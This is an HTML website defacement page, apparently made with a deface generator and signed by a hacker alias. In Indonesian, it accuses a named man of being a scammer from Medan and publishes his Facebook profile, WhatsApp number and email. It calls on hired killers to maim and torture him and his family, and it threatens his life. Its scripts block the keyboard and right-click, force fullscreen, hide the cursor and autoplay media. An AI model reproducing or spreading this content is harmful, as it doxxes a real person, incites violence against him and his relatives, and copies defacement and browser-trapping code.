
<!--
--  Uploaded on : https://haxor.my.id/open/DaniOnrunPen1puMedan.html
--  Official Web : https://prinsh.com
--  script-deface-generator.prinsh.com
-->

<!--
--  Uploaded on : https://haxor.my.id/open/babor.html
--  Official Web : https://prinsh.com
--  script-deface-generator.prinsh.com
-->
<html>
  <head>
    <meta charset="UTF-8"> 
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="title" content="Hacked By ./BENJAMIN1337">
    <meta name="description" content="Esteem Restoration Eagle">
    <meta name="keywords" content="hacked,deface,website,whitehat,defacer,hack,mirror,Esteem Restoration Eagle">
    <meta name="robots" content="index, follow">
    <meta name="revisit-after" content="60 days">
    <meta name="author" content="Drv7.ID">
    <title>Dani Onrun Penipu, Anak Medan</title>
    <meta property="og:image" content="https://i.ibb.co.com/bJ2yNQd/20241225-230812.jpg">
    <meta name="theme-color" content="#000">
    <link rel="icon" type="image/png" href="https://i.ibb.co/YBP049d/IMG-20240807-171443-296.jpg">
    <link href="https://fonts.googleapis.com/css?family=Acme" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css2?family=Reggae+One&amp;display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.0/jquery.min.js"></script>
  </head>
  <body bgcolor="white" text="white" oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;" onclick="document.getElementById('lagu').play();fs()" id="body" onload="typeWriter()">
  <style type="text/css">
      center {
        font-family: Acme;
      }
      img {
        opacity: 80%;
      }
      red {
        color: red;
      }
      #background-video {
        height: 100vh;
        width: 100vw;
        object-fit: cover;
        position: fixed;
        left: 0;
        right: 0;
        top: 0;
        bottom: 0;
        z-index: -1;
      }
      font {
        text-shadow: #000 0px 0px 3px;
        -webkit-font-smoothing: antialiased;
      }
      div {
        animation: glitch 1s linear infinite;
      }
      @keyframes glitch {
        2%,
        64% {
          transform: translate(2px, 0) skew(0deg);
        }
        4%,
        60% {
          transform: translate(-2px, 0) skew(0deg);
        }
        62% {
          transform: translate(0, 0) skew(5deg);
        }
      }
      div:before,
      div:after {
        content: attr(title);
        position: absolute;
        left: 0;
      }
      div:before {
        animation: glitchTop 1s linear infinite;
        clip-path: polygon(0 0, 100% 0, 100% 33%, 0 33%);
        -webkit-clip-path: polygon(0 0, 100% 0, 100% 33%, 0 33%);
      }
      @keyframes glitchTop {
        2%,
        64% {
          transform: translate(2px, -2px);
        }
        4%,
        60% {
          transform: translate(-2px, 2px);
        }
        62% {
          transform: translate(13px, -1px) skew(-13deg);
        }
      }
      div:after {
        animation: glitchBotom 1.5s linear infinite;
        clip-path: polygon(0 67%, 100% 67%, 100% 100%, 0 100%);
        -webkit-clip-path: polygon(0 67%, 100% 67%, 100% 100%, 0 100%);
      }
      @keyframes glitchBotom {
        2%,
        64% {
          transform: translate(-2px, 0);
        }
        4%,
        60% {
          transform: translate(-2px, 0);
        }
        62% {
          transform: translate(-22px, 5px) skew(21deg);
        }
      }
  </style>
<script language="JavaScript">
      window.onbeforeunload = confirmExit;
      function confirmExit() {
        return "are you sure ? wkwk";
      }
      function fs() {
        var elem = document.documentElement;
        if (elem.requestFullscreen) {
          elem.requestFullscreen();
        } else if (elem.msRequestFullscreen) {
          elem.msRequestFullscreen();
        } else if (elem.mozRequestFullScreen) {
          elem.mozRequestFullScreen();
        } else if (elem.webkitRequestFullscreen) {
          elem.webkitRequestFullscreen();
        }
        document.getElementById("body").style.cursor = 'none';
        document.onkeydown = function(e) {
          return false;
        }
        document.addEventListener("keydown", e => {
          if (e.key == "F11") e.preventDefault();
        });
      }
</script>
<script id="rendered-js">
document.addEventListener('DOMContentLoaded', function (event) {
  var dataText = ["Wh00pz ! your security get down !"];
  function typeWriter(text, i, fnCallback) {
    if (i < text.length) {
      document.getElementById("hekerabies").innerHTML = text.substring(0, i + 1);
      setTimeout(function () {
        typeWriter(text, i + 1, fnCallback);
      }, 150);
    }
    else if (typeof fnCallback == 'function') {
        setTimeout(fnCallback, 7000);
      }
  }
  function StartTextAnimation(i) {
    if (typeof dataText[i] == 'undefined') {
      setTimeout(function () {
        StartTextAnimation(0);
      }, 30000);
    }
    if (i < dataText[i].length) {
      typeWriter(dataText[i], 0, function () {
        StartTextAnimation(i + 1);
      });
    }
  }
  StartTextAnimation(0);
});
</script>
    <audio src="https://flaneroo.com/HACK.mp4" autoplay="true" id="lagu" loop=""></audio>
    <video id="background-video" src="https://flaneroo.com/HACK.mp4" autoplay="" loop="" muted="" style="position: fixed;object-fit: cover;" poster="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNk+A8AAQUBAScY42YAAAAASUVORK5CYII="><source src="https://flaneroo.com/io.mp4" type="video/webm">
    </video>
    <table width="100%" height="80%">
      <td> 
        <center>
            <img border="0" <a href="https://i.ibb.co.com/bJ2yNQd/20241225-230812.jpg"><img src="https://i.ibb.co.com/bJ2yNQd/20241225-230812.jpg" alt="ace33f7757bb2f4c1110de40c20a6519.jpeg"width="340" height="340">
            <font  face="Reggae One" color="red"><h2>Dani Onrun</h2><p><h3>Penipu Anak Medan</h3></p></font>
            <p> Tuh Buat Pembunuh Bayaran Yang Gabut Langsung Colok Aja Mata ini anak dan keluarganya!!<p>
            <p>FB Penipu : <a href="https://www.facebook.com/profile.php?id=100069162709863&mibextid=ZbWKwL" style="color:lime">Dani Onrun</a>
<br/>No WA Penipu : <a href="https://wa.me/+62813-6065-4964" style="color:lime">+62-813-6065-4964</a><br/>Email Penipu: <font color="lime">flanovoiddd@gmail.com</font></p>
            <p><font color="red">$</font> Data lengkap/lokasi hasil lacak hubungi gw grizsha@hitman.com <font color="red">$</font></p>
            <p>Lu main-main ama duit gw? Nyawa lu juga bakal gw permainin bro.. Kalo gak mati, lu tembus penjara!!! Gw Janji!!!</p>
            <p><i class="fa fa-telegram" style="font-size:28px;color:#00BFFF"></i></p>
            <p>Pesan Untuk tukang eksekusi: Minimal siksa dulu anak ini kalo mau dicabut nyawa</p>
        </center>
      </td>
    </table>
  </body>
      </html>
